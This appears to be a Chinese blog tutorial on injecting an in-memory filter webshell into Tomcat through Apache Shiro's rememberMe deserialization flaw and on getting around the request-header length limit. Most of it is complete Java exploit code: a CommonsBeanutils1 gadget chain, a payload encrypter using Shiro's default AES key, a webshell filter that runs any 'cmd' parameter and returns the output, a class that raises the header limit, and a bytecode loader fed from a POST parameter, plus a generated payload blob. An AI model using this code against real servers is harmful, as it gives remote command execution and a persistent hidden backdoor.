shiro注入filter内存马（绕过长度限制）

shiro环境

https://github.com/yyhuni/shiroMemshell（实验环境）

这里用的
Client_memshell.java

package com.example.demo;import javassist.ClassPool;
import javassist.CtClass;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;public class Client_memshell {public static void main(String[] args) throws Exception {ClassPool pool = ClassPool.getDefault();CtClass clazz = pool.get(BehinderFilter.class.getName());byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());AesCipherService aes = new AesCipherService();byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");ByteSource ciphertext = aes.encrypt(payloads, key);System.out.printf(ciphertext.toString());}
}

BehinderFilter.java

package com.example.demo;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Field;
import org.apache.catalina.core.StandardContext;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.io.IOException;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import java.lang.reflect.Constructor;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.Context;
import javax.servlet.*;public class BehinderFilter extends AbstractTranslet implements Filter {static {try {final String name = "evil";final String URLPattern = "/*";WebappClassLoaderBase webappClassLoaderBase =(WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");Configs.setAccessible(true);Map filterConfigs = (Map) Configs.get(standardContext);BehinderFilter behinderFilter = new BehinderFilter();FilterDef filterDef = new FilterDef();filterDef.setFilter(behinderFilter);filterDef.setFilterName(name);filterDef.setFilterClass(behinderFilter.getClass().getName());/*** 将filterDef添加到filterDefs中*/standardContext.addFilterDef(filterDef);FilterMap filterMap = new FilterMap();filterMap.addURLPattern(URLPattern);filterMap.setFilterName(name);filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);constructor.setAccessible(true);ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);filterConfigs.put(name, filterConfig);} catch (NoSuchFieldException ex) {ex.printStackTrace();} catch (InvocationTargetException ex) {ex.printStackTrace();} catch (IllegalAccessException ex) {ex.printStackTrace();} catch (NoSuchMethodException ex) {ex.printStackTrace();} catch (InstantiationException ex) {ex.printStackTrace();}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {System.out.println("Do Filter ......");String cmd;if ((cmd = servletRequest.getParameter("cmd")) != null) {Process process = Runtime.getRuntime().exec(cmd);java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));StringBuilder stringBuilder = new StringBuilder();String line;while ((line = bufferedReader.readLine()) != null) {stringBuilder.append(line + '\n');}servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());servletResponse.getOutputStream().flush();servletResponse.getOutputStream().close();return;}filterChain.doFilter(servletRequest, servletResponse);System.out.println("doFilter");}@Overridepublic void destroy() {}
}

CommonsBeanutils1Shiro.java

package com.example.demo;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;public class CommonsBeanutils1Shiro {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public byte[] getPayload(byte[] clazzBytes) throws Exception {TemplatesImpl obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});setFieldValue(obj, "_name", "HelloTemplatesImpl");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);// stub data for replacement laterqueue.add("1");queue.add("1");setFieldValue(comparator, "property", "outputProperties");setFieldValue(queue, "queue", new Object[]{obj, obj});// ==================// 生成序列化字符串ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(queue);oos.close();return barr.toByteArray();}
}

进行base64和aes加密

然后将这段输入漏洞处rememberme=



注意：
一开始输入这段很长的payload返回包会报400，如下：
这是因为tomcat有最大请求头的长度限制，我本地添加如下（修改maxHTTPHeaderSize）

即可正常返回200，注入成功，因此实战过程还有绕过长度限制
https://zhuanlan.zhihu.com/p/516836433

同时代码种爆红

绕过长度限制（maxHttpHeaderSize）

网上给了三种解决方式
1.修改maxHttpHeaderSize
2.将class bytes使用gzip+base64压缩编码（暂不研究）
3.从POST请求体中发送字节码数据（强烈推荐）
第一种：

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {static {try {java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);contextField.setAccessible(true);headerSizeField.setAccessible(true);serviceField.setAccessible(true);requestField.setAccessible(true);getHandlerMethod.setAccessible(true);org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();for (int i = 0; i < connectors.length; i++) {if (4 == connectors[i].getScheme().length()) {org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();for (int j = 0; j < classes.length; j++) {// org.apache.coyote.AbstractProtocol$ConnectionHandlerif (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");globalField.setAccessible(true);processorsField.setAccessible(true);org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);for (int k = 0; k < list.size(); k++) {org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));// 10000 为修改后的 headersize headerSizeField.set(tempRequest.getInputBuffer(),10000);}}}// 10000 为修改后的 headersize ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(10000);}}}} catch (Exception e) {}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}

思路是改变org.apache.coyote.http11.AbstractHttp11Protocol的maxHeaderSize的大小，这个值会影响新的Request的inputBuffer时的对于header的限制

第三种的实现如下：

tomcat+shiro环境下

还是利用CommonsBeanutils1Shiro类，Client_memshell类，ClassDataLoader为最终写好的绕过类（相当于加载类）
ClassDataLoader.java

package com.example.demo;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;public class ClassDataLoader extends AbstractTranslet{public ClassDataLoader() throws Exception {Object o;String s;String classData = null;boolean done = false;Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads");for (int i = 0; i < ts.length; i++) {Thread t = ts[i];if (t == null) {continue;}s = t.getName();if (!s.contains("exec") && s.contains("http")) {o = getFV(t, "target");if (!(o instanceof Runnable)) {continue;}try {o = getFV(getFV(getFV(o, "this$0"), "handler"), "global");} catch (Exception e) {continue;}java.util.List ps = (java.util.List) getFV(o, "processors");for (int j = 0; j < ps.size(); j++) {Object p = ps.get(j);o = getFV(p, "req");Object conreq = o.getClass().getMethod("getNote", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});classData = (String) conreq.getClass().getMethod("getParameter", new Class[]{String.class}).invoke(conreq, new Object[]{new String("classData")});byte[] bytecodes = org.apache.shiro.codec.Base64.decode(classData);java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});defineClassMethod.setAccessible(true);Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});cc.newInstance();done = true;if (done) {break;}}}}}public Object getFV(Object o, String s) throws Exception {java.lang.reflect.Field f = null;Class clazz = o.getClass();while (clazz != Object.class) {try {f = clazz.getDeclaredField(s);break;} catch (NoSuchFieldException e) {clazz = clazz.getSuperclass();}}if (f == null) {throw new NoSuchFieldException(s);}f.setAccessible(true);return f.get(o);}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}}

和上面的实现利用不一样的是，这里我们用Client_memshell来对绕过的加载类进行AES+base64加密，将得到的结果放到头部cookie的rememberme=处
本次实验加载器到的结果如下（每次运行都不一样，所以以后用的时候还需要代码生成，不能直接搬运）

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

而我们的恶意类BehinderFilter（也就是内存马），进行base64编码+url编码，放到classData参数（这里必须是classData其他不行）处

cat /root/Desktop/BehinderFilter.class|base64 |sed ':label;N;s/\n//;b label'

然后放到数据包中即可

成功截图：


之后完善分段加载方式